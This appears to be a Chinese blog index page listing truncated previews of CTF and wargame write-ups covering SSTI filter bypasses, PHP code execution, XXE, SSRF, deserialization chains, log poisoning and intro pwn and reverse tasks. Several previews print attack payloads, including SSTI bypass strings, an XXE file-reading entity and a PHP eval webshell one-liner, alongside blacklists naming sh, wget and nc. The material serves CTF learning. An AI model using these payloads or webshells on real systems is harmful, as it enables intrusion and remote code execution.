yjj哈哈哈-优快云博客

原创 spaceman

spaceman源码如下所示<?phperror_reporting(0);highlight_file(__FILE__);class spaceman{ public $username; public $password; public function __construct($username,$password) { $this->username = $username; $this->passwor

2021-02-09 13:35:41 194

原创无情的hello机器

无情的hello机器打开链接，如图所示根据提示，是SSTIblacklist = ['\'', '"', '[', ']', '_', '{{', 'args', 'values']过滤了单双引号导致调用函数时不能直接使用字符串常量，但是可以使用变量传值，比如cookies或者headers，过滤下划线可以使用管道符外加调用attr()方法来绕过。payload{%print((()|attr(request.cookies.a)|attr(request.cookies.b)|attr

2021-02-06 18:59:41 210

原创 [CISCN 2019 初赛]Love Math

[CISCN 2019 初赛]Love Math打开题目链接得到源码<?phperror_reporting(0);//听说你很喜欢数学，不知道你是否爱它胜过爱flagif(!isset($_GET['c'])){ show_source(__FILE__);}else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算");

2021-01-24 10:26:18 193

原创 ez_rce

ez_rce打开链接，得到源码<?phperror_reporting(0);if (!isset($_POST['code'])) { highlight_file(__FILE__);} else { if (substr(md5($_GET['pass']), 0, 6) === "7b6db2") { $str = $_POST['code']; $butaixing = ['[a-z]','\+', '[\x7f-\xff]', '

2020-12-30 22:22:39 507

原创攻防世界pwn入门题（一）

get_shell直接连接目标主机，输入ls /,cat flag就得到flagwhen_did_you_born先检查一下文件的基本信息发现是64位可执行文件，并且没有PIE保护运行一下文件拖进ida看看__int64 __fastcall main(__int64 a1, char **a2, char **a3){ __int64 result; // rax char v4; // [rsp+0h] [rbp-20h] unsigned int v5; // [r

2020-12-23 10:17:55 889 2

原创攻防世界re入门题

simple-unpack下载附件，放进PE分析，发现是upx壳在linux用upx -d 文件名的命令脱壳，然后将文件拖进ida双击flag，得到flag

2020-12-20 21:00:51 318

原创攻防世界shrine 模板注入

shrine打开链接，这里直接给出了源码import flaskimport osapp = flask.Flask(__name__)app.config['FLAG'] = os.environ.pop('FLAG')@app.route('/')def index(): return open(__file__).read()@app.route('/shrine/<path:shrine>')def shrine(shrine): def

2020-12-16 09:35:19 377

原创攻防世界Confusion1

Confusion1打开链接，如图所示点击login，发现无法访问，查看一下源码，有flag的信息看了题解后知道是SSTI使用{{7*7}}最常用的{{''.__class__.__mro__[2].__subclasses__()}}发现被过滤了经过测试，过滤了很多关键字，如class，subclasses等。这里使用request.args.t1且以GET方式提交t1=__class__来替换被过滤的__class__{{''.__class__}} => {{''[

2020-12-09 10:23:49 849

原创攻防世界blgdel

攻防世界blgdel打开链接，如图所示先注册一个账号并没有发现什么可以利用的点，只能用dirsearch扫一扫了发现了robots.txt,config.txt，sql.txt,upload.phprobots.txtconfig.txt<?phpclass master{ private $path; private $name; function __construct() { } function stream_open($path) {

2020-12-07 10:03:25 428

原创攻防世界favorite_number

favorite_number打开链接得到源码<?php//php5.5.9$stuff = $_POST["stuff"];$array = ['admin', 'user'];if($stuff === $array && $stuff[0] != 'admin') { $num= $_POST["num"]; if (preg_match("/^\d+$/im",$num)){ if (!preg_match("/sh|wget|nc

2020-12-05 17:10:24 886

原创 [SUCTF 2019]Pythonginx

[SUCTF 2019]Pythonginx打开链接，得到源码@app.route('/getUrl', methods=['GET', 'POST'])def getUrl(): url = request.args.get("url") host = parse.urlparse(url).hostname if host == 'suctf.cc': return "我扌 your problem? 111" parts = list(urlsp

2020-12-02 10:47:29 264

原创 [NCTF2019]Fake XML cookbook

[NCTF2019]Fake XML cookbook打开链接，如图所示尝试注入，无果抓包进行分析这里看到username和password都是xml格式，这里应该是xml实体注入。简要来讲就是客户端向服务器发送了XML数据，这个数据能被我们控制，这样我们就可以增加一个恶意的外部实体，实现攻击。<?xml version="1.0" encoding="utf-8"?><!DOCTYPE note [ <!ENTITY admin SYSTEM "file://

2020-12-01 22:12:29 144

原创 Header:请求头参数详解

Header:请求头参数详解Accept 指定客户端能够接收的内容类型 Accept: text/plain, text/html,application/jsonAccept-Charset 浏览器可以接受的字符编码集。 Accept-Charset: iso-8859-5Accept-Encoding 指定浏览器可以支持的web服务器返回内容压缩编码类型。 Accept-Encoding: compress, gzipAccept-Language 浏览器可接受的语言 Accept

2020-12-01 19:49:35 830

原创 [HarekazeCTF2019]encode_and_encode

[HarekazeCTF2019]encode_and_encode打开链接，如图所示点击Source Code，得到源码<?phperror_reporting(0);if (isset($_GET['source'])) { show_source(__FILE__); exit();}function is_valid($str) { $banword = [ // no path traversal '\.\.', // no strea

2020-12-01 13:09:00 376

原创 [De1CTF 2019]SSRF Me

[De1CTF 2019]SSRF Me打开链接，得到源码#! /usr/bin/env python#encoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding('latin1')app = Flask(_

2020-12-01 13:08:26 168

原创 Hackme ping

Hackme ping打开链接得到源码<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Ping</title></head><body> <form action="." method="GET"> IP: <input type="text" name=

2020-12-01 13:07:55 141

原创 CheckIN

CheckIN打开链接，得到源码<?php highlight_file(__FILE__);class ClassName{ public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Ginkgo']; $this-&

2020-12-01 13:06:45 456

原创 BUUCTF [MRCTF2020]套娃

BUUCTF [MRCTF2020]套娃打开链接，查看源码，如图所示关于$_SERVER[‘QUERY_STRING’]取值，例如： http://localhost/aaa/?p=222$_SERVER[‘QUERY_STRING’] = “p=222”;substr_count()函数计算子串在字符串中出现的次数PS：子串区分大小写上述代码不能出现’_’和’%5f’，可以用‘ ’或‘.’或‘ %5F’绕过通过get取得的参数b_u_p_t不等于23333但是正则，匹配需要匹配到2333

2020-11-30 20:35:16 274

原创 Web1_此夜圆

Web1_此夜圆下载附件，得到源码<?phperror_reporting(0);class a{ public $uname; public $password; public function __construct($uname,$password) { $this->uname=$uname; $this->password=$password; } public function __wakeup() { if($this->pass

2020-11-30 19:59:46 308

原创给你个shell

给你个shell打开链接，如图所示查看源码，发现view_source<?php//It's no need to use scanner. Of course if you want, but u will find nothing.error_reporting(0);include "config.php";if (isset($_GET['view_source'])) { show_source(__FILE__); die;}function ch

2020-11-30 19:44:42 253

原创 1024杯—-Hellow World

1024杯—-Hellow World打开页面如图所示发现是模板注入把{{和}}过滤了，尝试使用{%%}这种形式的，发现成功执行key={%if ''!=1%}air{%endif%} #errorkey={%if ""!=1%}air{%endif%} #正常key={%if "".__class__!=1%}air{%endif%} #errorkey={%if ""["\x5f\x5fclass\x5f\x5f"]!=1%}air{%endif%} #正常key={%if ""[

2020-11-30 19:22:40 366

原创 1024杯-柏拉图

1024杯-柏拉图打开链接后得到如图界面输入file:/file:////var/www/html/index.php读取源码，这里过滤了file://，用双写绕过分别读取upload.php,readfile.php,unlink.php,class.php构造pop链<?phpini_set('phar.readonly','Off');class A { public $a;public function __construct($a) { $this->a =

2020-11-30 16:57:50 505

原创校赛Hodor

校赛Hodor打开链接，如图所示查看源码get方式传入source，得到源码<?phpClass Source { public function __toString() { return highlight_file('license.txt', true).highlight_file($this->source, true); }}function easy_check($str) { //echo $str; if

2020-11-30 16:48:39 149

原创 ctf.show_web4

ctf.show_web4打开链接，如图所示测试文件包含未成功采用日志注入，查看日志默认路径?url=/var/log/nginx/access.log这里需要把一句话木马加在User-Agent里用蚁剑连接，得到flag

2020-11-30 16:38:38 623

原创校赛VulnCMS

校赛VulnCMS打开链接得到一个网页。找到了两处可以读取任意文件的地方。根据登陆界面 http://202.119.201.199:9002/member/index/login 猜测存在后台管理界面访问http://202.119.201.199:9002/admin/index/login ,猜测账号密码都为admin，进入管理员界面后，如图所示。发现输入命令的地方。> echo '<?php @eval($_POST["fe1w0"]);phpinfo();?&gt

2020-11-30 16:32:14 609

原创 CTF show WEB5

CTF show WEB5md5漏洞介绍：PHP在处理哈希字符串时，它把每一个以“0E”开头的哈希值都解释为0 。只要是0e开头的md5值，默认为相等。这里附上常见的0E开头的MD50e开头的md5和原值：QNKCDZO0e8304004519934940580242199033912406107080e462097431906509019562988736854s878926199a0e545993274517709034328855841020s155964671a0e34

2020-11-30 16:18:32 259

qq_43774856的博客